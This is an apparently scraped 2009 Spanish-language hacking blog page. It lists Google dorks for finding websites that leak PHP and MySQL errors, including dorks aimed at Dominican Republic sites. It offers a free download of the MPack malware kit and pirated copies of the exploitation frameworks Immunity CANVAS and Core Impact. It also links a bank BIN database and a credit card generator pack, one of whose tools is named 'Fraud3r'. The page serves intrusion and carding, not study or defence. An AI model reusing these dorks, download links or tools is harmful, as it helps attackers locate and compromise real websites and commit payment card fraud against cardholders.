| Mobile| RSS

10 Web Application Fuzzing Tools

jueves, 26 de noviembre de 2009 | Tags: | 49 comentario [ Mas... ]

busqueda google

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

inurl:"id=" & intext:"Warning: mysql_fetch_array()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: is_writable()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: Unknown()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: pg_exec()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: mysql_query()

inurl:"id=" & intext:"Warning: array_merge()

inurl:"id=" & intext:"Warning: preg_match()

inurl:"id=" & intext:"Warning: ilesize()

inurl:"id=" & intext:"Warning: filesize()

inurl:"id=" & intext:"Warning: require()

busqueda de web vulnerable en rep.dom

Good dork:

site:.do inurl:.asp?id=
site:.org inurl:.asp?id=
site:.com inrul:.aspx?=
site:.do inurl:.asp?cid=

Aspx Shells

Mpack, PHP Malware Kit

Mpack, PHP Malware Kit


el paquete comerciar cuesta 500 dolar pero para ustedes sera gratis

I Have had this in my Rapidshare account for a while, i thought i would post it here.
http://rapidshare.com/files/127876811/MPack_Toolkit_v0.94.rar

Password is "Infected"

Immunity Canvas 6.23

just got it fully working, here is a pic.


Quote:
Immunity CANVAS Professional Immunity's CANVAS makes available hundreds of exploits, an automated exploitation system, and a comprehensive, reliable exploit development framework to penetration testers and security professionals worldwide. To see CANVAS in action please see our movies.
Cost License:
Current Price: $1450
- one license allows up to 10 users/installations
- includes one quarter of updates and support
- unrestricted (no target IP address limitations)
- full source code
- Your use of CANVAS Professional does not expire when your support period is over.

Monthly Updates and Support: $730.00 per quarter
Early Updates and Support: $8995.00 per quarter

Supported Platforms and Installations
- Windows (requires Python & PyGTK)
- Linux
- MacOSX (requires PyGTK)
- All other Python environments such as mobile phones and commercial Unixes (command line version only supported, GUI may also be available)

Architecture
- CANVAS Professional's completely open design allows a team to adapt CANVAS Professional to their environment and needs.
Documentation
- all documentation is delivered in the form of demonstration movies
- exploit modules have additional information windows

Exploits
- currently over 400 exploits, an average of 4 exploits added every monthly release
- Immunity carefully selects vulnerabilities for inclusion as CANVAS exploits. Top priorities are high-value vulnerabilities such as remote, pre-authentication, and new vulnerabilities in mainstream software.
- Exploits span all common platforms and applications

Payload Options
- to provide maximum reliability, exploits always attempt to reuse socket
- if socket reuse is not suitable, connect-back is used
- subsequent MOSDEF session allows arbitrary code execution, and provides a listener shell for common actions (file management, screenshots, etc)
- bouncing and split-bouncing automatically available via MOSDEF
- adjustable covertness level

Exploit Delivery
- regular monthly updates made available via web
- exploit modules and CANVAS engine are updated simultaneously
- customers reminded of monthly updates via email

Exploit Creation Time
- exploits included in next release as soon as they are stable

Effectiveness of Exploits
- all exploits fully QA'd prior to release
- exploits demonstrated via flash movies
- exploit development team available via direct email for support

Ability to make Custom Exploits
- unique MOSDEF development environment allows rapid exploit development

Development
- CANVAS is a platform that is designed to allow easy development of other security products. Examples include Gleg, Ltd's VulnDisco and the Argeniss Ultimate 0day Exploits Pack.
Here is download Link

Mars Bank Database 1.1 (Last) Features Banks database with search, filter and sorting possibilities. Contains 11 databases in one: - US banks ABA

Mars Bank Database 1.1 (Last)




Features

Banks database with search, filter and sorting possibilities. Contains 11 databases in one:
- US banks ABA numbers (25,871 records)
- US banks routing numbers (26,197 records)
- MasterCard bank identification numbers (17,297 records)
- VISA bank identification numbers (35,154 records)
- American Express bank identification numbers (1,215 records)
- US ZIP codes (70,884 records)
- US busy phones (11,784 records)
- Social Security Numbers regions (678 records)
- US Dial Area Codes (249 records)
- US states (65 records)
- UK states (114 records)

Bank Identification Number, BIN - first 6 digits from card number. You can identify any credit/debit card.

For ABA numbers, database has these kind of data:
ABA number, bank name, bank address, bank city, bank state, bank zip, bank phone.
For routing numbers:
routing number, bank name, bank city, bank state, bank phone.
For MasterCard BINs:
BIN, bank name, bank country, bank phone.
For VISA BINs:
BIN, bank name, bank country, card type 1, card type 2, bank phone.
For American Express BINs:
BIN, bank country (always USA), card type (gold, optima, platinum...), bank phone.
For US ZIP codes:
city, state, ZIP code, county.
For US busy phones:
state, city, phone.
For SSN regions:
first 3-digits of SSN, state.
For US Dial Area Codes:
3-digit code, states where this code used
For US states:
state (2 letters), state full name.
For UK states:
state name, country (England, Ireland, Scotland...).

It's possible to make search, filter or sort base by any of this field or some fields together.
Also you can add any notes with some text formatting and colors. This text will be auto saved.
Program supports skins and includes 24 themes. Also it's possible to use .msstyles themes.


Download
Code:
http://www.mars-soft.net/files/MarsBanksBase11.exe

[CC'V] Credit Cards Generators (AIO)

[CC'V] Credit Cards Generators (AIO)

++In This AIO are 21 Generators: ++
++12 Generators with American Credit Cards and 9 Generators with German Credit Cards . ++
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++
++American Credit Card Generators are: ++
++ American Express card generator v1 beta1 ++
++ Card Tool 1.4 ++
++ CC 2 Bank 1.2 ++
++ CC Generator PROBE ++
++ CC Generator 1.1 ++
++ CC Maker ++
++ Credit Wizard v1.1 ++
++ Credit Master v4.0 ++
++ CC 2 Retriever ++
++ Fraud3r v1.0 Credit Card and ID Generator ++
++ Verify all 4 types of the major credit cards (MC,Visa,Amex and Discover) ++
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++++++++++
++German Credit Cards Generators are: ++
++ Citi Bank 1.0 ++
++ CN-Security CCGetV1.1 (Albanian Author) ++
++ Hypo Konto Creator 1.0 ++
++ Konto Master 1.1 ++
++ Perso Generator 0.3 ++
++ Perso Generator 1.0 ++
++ Call Ya Generator ++
++ Credit Card Generator V2 by TheCracker (Albanian Author) ++
++ Generator Final (Albanian Author) ++
++ CC Generator by mix2mix (Albanian Author) ++


Descargar:
CC-GeN_SBy-aSt.exe - File Shared from Box.net - Free Online File Storage

Core Impact Pro.+full

this is V4, and its laim, but it works...

http://rapidshare.com/files/86961467/core_impact_4.rar

Canvas : A Comprehensive Exploitation Framework

Ciber Protesta

Blog Archive

Labels

Blogumulus by Roy Tanck and Amanda Fazani

Twitter